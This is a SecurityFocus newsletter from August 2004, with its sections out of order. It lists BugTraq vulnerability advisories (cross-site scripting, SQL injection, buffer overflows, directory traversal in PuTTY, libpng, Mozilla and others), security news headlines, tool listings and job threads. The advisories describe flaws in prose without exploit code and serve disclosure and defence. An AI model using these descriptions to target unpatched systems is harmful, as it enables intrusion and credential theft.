Attackers may exploit this vulnerability to obtain the authentication credentials of other forum users. If the domain hosts other applications, their credentials and/or other sensitive information (session IDs, etc) may be exposed.
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Wardriving guilty plea in Lowe's wi-fi case
By: Kevin Poulsen
Federal prosecutors say a network engineer convicted for checking his e-mail over a hardware store's wi-fi network is likely the first U.S. wardriving conviction.
http://www.securityfocus.com/news/9281
2. Ashcroft wins Internet wiretap system
By: Kevin Poulsen
U.S. regulators vote to wire broadband networks for law enforcement surveillance.
http://www.securityfocus.com/news/9263
3. ATM keypads get a security boost
By: Kevin Poulsen
Credit card companies are responding to a host of high and low-tech attacks on the sanctity of your ATM code.
http://www.securityfocus.com/news/9161
4. Phishermen attack on a viral scale
By: John Leyden, The Register
The prevalence of some phishing attacks are beginning to rival even high-level viral outbreaks, according to email filtering firm MessageLabs.
http://www.securityfocus.com/news/9297
5. Price isn't right for new Bagle variant
By: John Leyden, The Register
Yet another variant of the mass-mailing Bagle worm began spreading widely yesterday.
http://www.securityfocus.com/news/9296
6. Phone spam misery looms Stateside
By: Andrew Orlowski, The Register
A little-noticed Bill before the Senate will ensure daily misery for US cellphone users, thanks to the inattentiveness of telecomms regulator the FCC.
http://www.securityfocus.com/news/9283
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. MonitorMagic - Server & Network Monitor 6.0
By: Tools4ever
Relevant URL: http://www.tools4ever.com/products/monitormagic/
Platforms: Windows 2000, Windows NT, Windows XP
Summary:
MonitorMagic is a proactive server and network monitoring and reporting tool for Windows 2003/XP/2000/NT servers, workstations and SNMP devices and supports agentless monitoring. MonitorMagic supports Windows and UNIX based resources such as memory, disk and CPU load and optionally records the values into a database to enable graphical trending and reporting. MonitorMagic ships with predefined policies for popular hardware and applications.
2. CipherPack Pro 3.2
By: VIO Systems Limited
Relevant URL: http://www.cipherpack.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Encrypts and compresses files and data into a single Windows executable. The user just runs it and when the correct key is supplied, the file decrypts. Without the correct key, the original file contents can never be seen.
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
By: Egemen Tas
Relevant URL: http://www.ModemWall.com/savungan.htm
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Savungan is a stateful inspection firewall designed for Microsoft Windows platforms available with FULL SOURCE CODE. It is an advanced filtering agent for TCP/IP based networks, having very flexible rule language to make packet inspection more powerful and effective. Security administrators have had some difficulties to build and maintain a suitable filtering infrastructure after deploying a firewall.
4. SSlDigger 1.0
By: Rudolph Araujo
Relevant URL: http://www.foundstone.com/s3i
Platforms: Windows XP
Summary:
SSL Digger looks at the SSL Ciphers that a web server supports. It produces a report and grades the site.
5. DiskLogon 1.0.17.112
By: DiskLogon Development Team
Relevant URL: http://www.disklogon.com/DiskLogon.exe
Platforms: Windows 2000, Windows XP
Summary:
DiskLogon, like a Smart Card logon, is a software that enables you to log on to your computer with a removable disk.
DiskLogon saves you the trouble of entering your user name and password every time you log on. All you have to do is to plug in your removable disk, and you can log on to your computer quickly and safely. When you plug out your removable disk, your computer will automatically lock up you're your safety.
6. UndeleteSMS 1.0
By: Arne Vidstrom
Relevant URL: http://vidstrom.net/downloads/undeletesms.exe
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
UndeleteSMS can recover deleted SMS messages from a GSM SIM card.
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
Relevant URL:
5. Is this some type of scan (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371085
VII. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
----------------------------------
1. most avtive attack type (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/371283
2. SecurityFocus Microsoft Newsletter #200 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/370780
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. Password recovery (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371287
2. How to Restrict a user, not a root, Login to the Con... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371161
3. trouble setting up routing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371160
4. ipv6 questions + solaris 9 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371158
5. syslog logging (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/370904
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. can Hopster traffic be blocked? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/371150
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: SPI Dynamics
ALERT: How Hackers Use LDAP Injection to Steal Your Data and Bypass
Authentication
It's as simple as placing additional LDAP query commands into a Web form
input box giving hackers complete access to all your backend systems!
Firewalls and IDS will not stop such attacks because LDAP Injections are
seen as valid data.
Download this *FREE* white paper from SPI Dynamics for a complete guide to
protection!
------------------------------
This issue sponsored by: SPI Dynamics
ALERT: How Hackers Use LDAP Injection to Steal Your Data and Bypass
Authentication
It's as simple as placing additional LDAP query commands into a Web form
input box giving hackers complete access to all your backend systems!
Firewalls and IDS will not stop such attacks because LDAP Injections are
seen as valid data.
Download this *FREE* white paper from SPI Dynamics for a complete guide to
protection!
http://www.securityfocus.com/sponsor/SPIDynamics_sf-news_040810
------------------------------------------------------------------------
I. FRONT AND CENTER
1. Deploying Network Access Quarantine Control (part 1 of 2)
2. Data Driven Attacks Using HTTP Tunneling
II. BUGTRAQ SUMMARY
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
2. MailEnable Content-Length Denial Of Service Vulnerability
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
6. Webbsyte Chat Denial Of Service Vulnerability
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
9. Horde IMP HTML+TIME HTML Injection Vulnerability
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
11. BreakCalendar Multiple Remote Vulnerabilities
12. ripMIME MIME Attachment Decoding Weakness
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
17. Pete Stein GoScript Remote Command Execution Vulnerability
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
19. DGen Emulator Symbolic Link Vulnerability
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
22. Jetbox One Plaintext Password Storage Vulnerability
23. Jetbox One Remote Server-Side Script Execution Vulnerability
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
26. Acme thttpd Directory Traversal Vulnerability
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
30. LILO gfxboot Plaintext Password Display Vulnerability
31. YaST2 Utility Library File Verification Shell Code Injection...
32. phpBB Fetch All SQL Injection Vulnerability
33. Neon WebDAV Client Library Unspecified Vulnerability
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
35. Oracle Multiple Unspecified Vulnerabilities
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
41. CVSTrac filediff Remote Command Execution Vulnerability
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
43. Mozilla SSL Redirect Spoofing Vulnerability
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
45. GNU Info Follow XRef Buffer Overrun Vulnerability
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Wardriving guilty plea in Lowe's wi-fi case
2. Ashcroft wins Internet wiretap system
3. ATM keypads get a security boost
4. Phishermen attack on a viral scale
5. Price isn't right for new Bagle variant
6. Phone spam misery looms Stateside
IV. SECURITYFOCUS TOP 6 TOOLS
1. MonitorMagic - Server & Network Monitor 6.0
2. CipherPack Pro 3.2
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
4. SSlDigger 1.0
5. DiskLogon 1.0.17.112
6. UndeleteSMS 1.0
V. SECURITYJOBS LIST SUMMARY
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
2. [SJ-JOB] Jr. Security Analyst, Busto Arsizio (VA), I... (Thread)
3. [SJ-JOB] CHECK Team Leader, London, GB (Thread)
4. [SJ-JOB] Account Manager, San Francisco, US (Thread)
5. [SJ-JOB] Sr. Security Analyst, Clearwater, US (Thread)
6. [SJ-JOB] Chief Security Strategist, Dallas, US (Thread)
7. [SJ-JOB] Security Consultant, Riyadh, SA (Thread)
8. [SJ-JOB] Quality Assurance, Santa Barbara, US (Thread)
9. [SJ-JOB] Security Product Manager, San Jose, US (Thread)
10. [SJ-JOB] Sr. Security Engineer, Boston, US (Thread)
11. [SJ-JOB] Evangelist, San Jose, US (Thread)
12. [SJ-JOB] Security Consultant, Indianopolis, US (Thread)
13. [SJ-JOB] Account Manager, New York, US (Thread)
14. [SJ-JOB] Security Consultant, Albany, NY, US (Thread)
15. [SJ-JOB] Security Consultant, San Francisco , US (Thread)
16. [SJ-JOB] Security Engineer, Eatontown, US (Thread)
17. [SJ-JOB] Security Consultant, Houston, US (Thread)
18. [SJ-JOB] Security Engineer, Washington, DC, US (Thread)
19. [SJ-JOB] Security Auditor, Miami, US (Thread)
20. [SJ-JOB] Security Engineer, New York (and NJ Metro A... (Thread)
21. [SJ-JOB] Management, Irvine, US (Thread)
22. [SJ-JOB] Security Consultant, Albany, US (Thread)
23. [SJ-JOB] Sales Engineer, Atlanta, US (Thread)
24. [SJ-JOB] Security Consultant, New York, US (Thread)
25. [SJ-JOB] Account Manager, Chicago, US (Thread)
26. [SJ-JOB] Sr. Security Engineer, Palo Alto, US (Thread)
VI. INCIDENTS LIST SUMMARY
1. New Mass Mailer Virus (Thread)
2. NDR +Hotmail & MSN (Thread)
3. distributed spamming/scamming scheme? (Thread)
4. Anyone else seeing SSH scans? (Thread)
5. Is this some type of scan (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. most avtive attack type (Thread)
2. SecurityFocus Microsoft Newsletter #200 (Thread)
IX. SUN FOCUS LIST SUMMARY
1. Password recovery (Thread)
2. How to Restrict a user, not a root, Login to the Con... (Thread)
3. trouble setting up routing (Thread)
4. ipv6 questions + solaris 9 (Thread)
5. syslog logging (Thread)
X. LINUX FOCUS LIST SUMMARY
1. can Hopster traffic be blocked? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Deploying Network Access Quarantine Control (part 1 of 2)
By Jonathan Hassell
This article discusses Network Access Quarantine Control with Windows
Server 2003, which allows administrators to quarantine mobile users before
giving them full network access, by first ensuring these machines are
up-to-date according to a baseline security model.
http://www.securityfocus.com/infocus/1794
2. Data Driven Attacks Using HTTP Tunneling
By Ido Dubrawsky
In this article we will look at a means to bypass the access control
restrictions of a company's router or firewall. This information is
intended to provide help for those who are legitimately testing the
security of a network (whether they are in-house expertise or outside
consultants).
http://www.securityfocus.com/infocus/1793
II. BUGTRAQ SUMMARY
-------------------
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
BugTraq ID: 10837
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10837
Summary:
Reportedly Webcam Corp Webcam Watchdog is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'sresult.exe'. All code will be executed within the context of the website running the vulnerable software.
2. MailEnable Content-Length Denial Of Service Vulnerability
BugTraq ID: 10838
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10838
Summary:
MailEnable is reported prone to a remote denial of service vulnerability. This vulnerability is reported to exist in the MailEnable HTTP header parsing code.
When reading a large content-length header field from an HTTP request, the operation overflows a fixed size memory buffer and the HTTP service will reportedly crash.
The vulnerability can be exploited to crash the affected HTTP service, denying service to legitimate users. The possibility to execute arbitrary code may also be present.
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
BugTraq ID: 10839
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10839
Summary:
Reportedly Gnu Transport Layer Security Library (GnuTLS) is affected by a X.509 certificate verification denial of service vulnerability. This issue is due to a design error that causes the application to attempt to verify invalid X.509 certificates.
This issue would allow an attacker to cause the affected application to consume CPU resources and hang while attempted verification takes place, denying service to legitimate users.
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
BugTraq ID: 10840
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10840
Summary:
The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server.
When malicious requests are received by the device, it will reportedly crash, denying service to legitimate users of the access point.
This issue can be exploited by anybody with network connectivity to the administration HTTP server, no authentication is required.
Version 1.21h of the device was found to be vulnerable, but other versions are also likely affected. Due to the practice of code-reuse in companies, it is also possible that other devices and products have this same flaw.
This BID may also be related to BID 6994, but this has not been confirmed.
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
BugTraq ID: 10841
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10841
Summary:
IBM Tivoli Directory Server is reported to contain a directory traversal vulnerability in its web front-end application.
This issue presents itself due to insufficient sanitization of user-supplied data.
This issue allows remote attackers to view potentially sensitive files on the server that are accessible to the 'ldap' user. This may aid an attacker in conducting further attacks against the vulnerable computer.
Versions 3.2.2, and 4.1 are reported vulnerable.
6. Webbsyte Chat Denial Of Service Vulnerability
BugTraq ID: 10842
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10842
Summary:
Webbsyte Chat is reported susceptible to a denial of service vulnerability.
This issue presents itself when multiple simultaneous TCP connections are made to the chat server. When this occurs, the application will reportedly crash, denying service to legitimate users.
Version 0.9 was reported vulnerable. The application is not supported any longer, so it is unlikely that a fix will become available.
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
BugTraq ID: 10843
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10843
Summary:
It is reported that Mozilla and Netscape contain an integer overflow vulnerability in the SOAPParameter object constructor. This overflow may result in the corruption of critical heap memory structures, leading to possible remote code execution.
An attacker can exploit this issue by crafting a malicious web page and having unsuspecting users view the page in a vulnerable version of Mozilla or Netscape.
Netscape 7.0, 7.1, and versions of Mozilla prior to 1.7.1 are known to be vulnerable to this issue. Users of affected versions of Netscape are urged to switch to Mozilla 1.7.1 or later, as new versions of Netscape are not likely to appear.
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
BugTraq ID: 10844
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10844
Summary:
It has been reported that the Sun Java Runtime Environment is affected by an access validation vulnerability within the XSLT processor.
An attacker might exploit this issue to allow an untrusted applet or application to read data from a trusted applet or application that is running within the same virtual machine. It has also been reported that this issue may facilitate privilege escalation.
9. Horde IMP HTML+TIME HTML Injection Vulnerability
BugTraq ID: 10845
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10845
Summary:
Reportedly Horde IMP is affected by an HTML injection vulnerability due to insufficient sanitization of HTML+TIME script.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
BugTraq ID: 10846
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10846
Summary:
WHM AutoPilot is reported prone to an information disclosure vulnerability. The issue is reported to exist due to a vulnerability in the functionality provided to permit an administrator to logon to WHM AutoPilot as another user.
It is reported that this vulnerability may be exploited by a remote attacker to disclose WHM AutoPilot usernames and passwords.
11. BreakCalendar Multiple Remote Vulnerabilities
BugTraq ID: 10847
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10847
Summary:
Reportedly BreakCalendar is affected by multiple remote vulnerabilities. These issues are due to a failure to sanitize user-supplied input.
An attacker could leverage these issues to conduct cross-site scripting attacks and to perform actions facilitated by the 'add event' and 'edit/remove event' forms.
12. ripMIME MIME Attachment Decoding Weakness
BugTraq ID: 10848
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10848
Summary:
It is reported that a weakness exists in ripMIMEs decoding routine.
If ripMIME is being used in conjunction with a virus scanning, or other similar type of application, this weakness has the affect of not passing the attachment to the engine. This means that the attachments will bypass the scanning process.
By bypassing the scanning process, the message may then be passed on to an end user while still containing virus, or other malicious code that should have been blocked by the filter.
Attackers may exploit this weakness by forming malicious content designed to pass through filtering software. This content is designed to be decoded by the end users MUA. Some MUAs may decode the MIME attachments, even though they are formed incorrectly, allowing the malicious content to be delivered.
Version 1.3.2.3 has been released which fixes this weakness.
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
BugTraq ID: 10849
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10849
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of buffer overflow in another application. This will force the software to attempt to block attempts to exploit the memory corruption vulnerability and in turn expose this vulnerability.
This issue is known to affect StackDefender 1.10.
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
BugTraq ID: 10850
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10850
Summary:
Reportedly PuTTY is affected by a remote, pre-authentication code execution vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
BugTraq ID: 10851
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10851
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of buffer overflow in another application. This will force the software to attempt to block attempts to exploit the memory corruption vulnerability and in turn expose this vulnerability.
This issue is known to affect StackDefender 2.0.
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
BugTraq ID: 10852
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10852
Summary:
A vulnerability in the Linux kernel in the 64-bit file offset handling code may allow malicious users to read kernel memory. This issue is due to a design error that causes the affected code to fail to properly validate file pointers.
An attacker may leverage this issue to read arbitrary Linux kernel memory. This could allow an attacker to read sensitive data such as cached passwords. This issue will certainly aid in further attacks against the affected computer.
It has been reported that the Linux 2.6.X kernel, although still vulnerable, might not be exploitable. This BID will be updated when more information becomes available.
17. Pete Stein GoScript Remote Command Execution Vulnerability
BugTraq ID: 10853
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10853
Summary:
Pete Stein GoScript is prone to a remote command execution vulnerability.
This may allow remote attackers to perform unauthorized actions on a victim computer in the context of the hosting Web server.
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
BugTraq ID: 10854
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10854
Summary:
Juniper Networks NetScreen firewalls configured to run the SSHv1 service are reported prone to a denial of service vulnerability. It is reported that the vulnerability may be triggered by a remote attacker, prior to any form of authentication.
19. DGen Emulator Symbolic Link Vulnerability
BugTraq ID: 10855
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10855
Summary:
DGen is reportedly affected by a symbolic link vulnerability. This issue is due to a design error that fails to properly verify files prior to writing to them.
Successful exploitation of this issue will allow a local attacker to cause the affected application to overwrite arbitrary files with the privileges of the user that invoked the affected application. Reportedly this issue could be leveraged to facilitate privilege escalation.
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
BugTraq ID: 10856
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10856
Summary:
It is reported that eNdonesia is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'mod.php'. All code will be executed within the context of the website running the vulnerable software.
This may allow for theft of cookie-based authentication credentials and other attacks.
Version 8.3 of the software is reported vulnerable. Other versions may also be affected.
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
BugTraq ID: 10857
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10857
Summary:
The libpng graphics library is reported prone to multiple vulnerabilities. The following issues are reported:
It is reported that a stack-based buffer overrun vulnerability exists in the libpng library (CAN-2004-0597).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When this image is viewed, the vulnerability may be triggered resulting in code execution occurring in the context of the user that viewed the malicious image.
A denial of service vulnerability is also reported to affect libpng (CAN-2004-0598).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, a NULL pointer dereference will occur resulting in a crash of the application that is linked to the vulnerable library.
Additionally several integer overrun vulnerabilities are reported to exist in png_handle_sPLT(), png_read_png() and other functions of libpng (CAN-2004-0599).
A remote attacker may exploit the integer-overrun conditions, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, an integer value may wrap, or be interpreted incorrectly resulting in a crash of the application that is linked to the vulnerable library, or may potentially result in arbitrary code execution.
This BID will be split into independent BIDs when further analysis of these vulnerabilities is complete.
22. Jetbox One Plaintext Password Storage Vulnerability
BugTraq ID: 10858
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10858
Summary:
It is reported that Jetbox One is prone to a plaintext password storage vulnerability.
A malicious user may use the sensitive data available from this vulnerability to launch further attacks against a vulnerable system.
It should be noted that although this vulnerability has been reported to affect Jetbox One version 2.0.8 other versions might also be affected.
23. Jetbox One Remote Server-Side Script Execution Vulnerability
BugTraq ID: 10859
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10859
Summary:
A vulnerability is reported to exist in Jetbox One that may allow a remote attacker to execute malicious scripts on a vulnerable system.
It is reported that an attacker may be able to place server side scripts in directories that could be accessed and executed later.
Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
Version 2.0.8 is reported vulnerable to this issue. Other versions may also be affected.
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
BugTraq ID: 10860
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10860
Summary:
It is reported that WackoWiki is susceptible to a cross-site scripting vulnerability in its textsearch form. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
Exploitation of this vulnerability may allow for theft of cookie-based authentication credentials and other attacks.
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
BugTraq ID: 10861
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10861
Summary:
PHP-Nuke is reported prone to an access control bypass vulnerability.
Reports indicate that a PHP-Nuke superuser may bypass access controls and privilege restrictions, to delete the PHP-Nuke "God Admin" account. This may be accomplished by making a specially crafted request for the "admin.php" script.
26. Acme thttpd Directory Traversal Vulnerability
BugTraq ID: 10862
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10862
Summary:
It is reported that thttpd is susceptible to a directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This issue only exists in the Windows port of the application, as it does not correctly take into consideration the environmental attributes of file system access in applications.
This issue may allow an attacker to retrieve arbitrary, potentially sensitive files, from the affected host computer, as the user that the thttpd process is running as.
Version 2.07 beta 0.4 of thttpd, running on a Microsoft Windows platform is reported vulnerable to this issue.
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
BugTraq ID: 10863
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10863
Summary:
Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported:
The first denial of service vulnerability reported results from a lack of sufficient sanitization performed on username data. It is reported that a user with a void name may be added. This action will result in a NullPointerException.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
The second denial of service vulnerability is reported to exist due to resource consumption. It is reported that the Free Web Chat server does not properly manage multiple connections that originate from the same location.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
BugTraq ID: 10864
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10864
Summary:
Gnome VFSs 'extfs' scripts are reported prone to an undisclosed vulnerability.
It is reported that a user that views specially crafted, attacker supplied URIs utilizing the 'extfs' VFS module may be able to execute arbitrary commands in the context of the user.
This BID will be updated as further information is disclosed.
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
BugTraq ID: 10865
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10865
Summary:
It is reported that there are multiple unspecified buffer overflow vulnerabilities in the MSN protocol module in Gaim.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
30. LILO gfxboot Plaintext Password Display Vulnerability
BugTraq ID: 10866
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10866
Summary:
Reportedly gfxboot is affected by a plain text password display vulnerability. This issue is due to a design error that fails to protect user passwords.
The problem reportedly results in the plain text lilo boot password to be displayed when typing.
An attacker might leverage this issue to read the plain text lilo boot password.
31. YaST2 Utility Library File Verification Shell Code Injection...
BugTraq ID: 10867
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10867
Summary:
YaST2 utility library 'liby2util' is affected by a file verification shell code injection vulnerability. This issue is due to a design error that fails to properly validate files.
An attacker could leverage this issue to inject malicious shell code into a file name being transferred using the vulnerable utility. This might facilitate privilege escalation and unauthorized access.
32. phpBB Fetch All SQL Injection Vulnerability
BugTraq ID: 10868
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10868
Summary:
It is reported that phpBB Fetch All is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input before using it in an SQL query.
The successful exploitation of this vulnerability depends on the implementation of the web application that includes phpBB Fetch All as a component. It may or may not be possible to effectively pass malicious SQL statements to the underlying function.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Versions prior to 2.0.12 are reported to be affected.
33. Neon WebDAV Client Library Unspecified Vulnerability
BugTraq ID: 10869
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10869
Summary:
It is reported that Neon contains an unspecified vulnerability. The cause of this vulnerability is currently unknown.
Due to the nature of the library, it is likely that this is a remotely exploitable issue.
It is currently unknown what the affects and impacts of this issue is. This BID will be updated immediately when more information becomes available.
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
BugTraq ID: 10870
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10870
Summary:
PSCP is reported prone to a buffer overrun vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
35. Oracle Multiple Unspecified Vulnerabilities
BugTraq ID: 10871
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10871
Summary:
It has been reported that multiple unspecified Oracle products contain multiple unspecified vulnerabilities.
The reported vulnerabilities include SQL injection, buffer overflows, and others.
Details about any of the vulnerabilities are unknown at this time. This BID will be updated and split into individual BIDs as further information is disclosed.
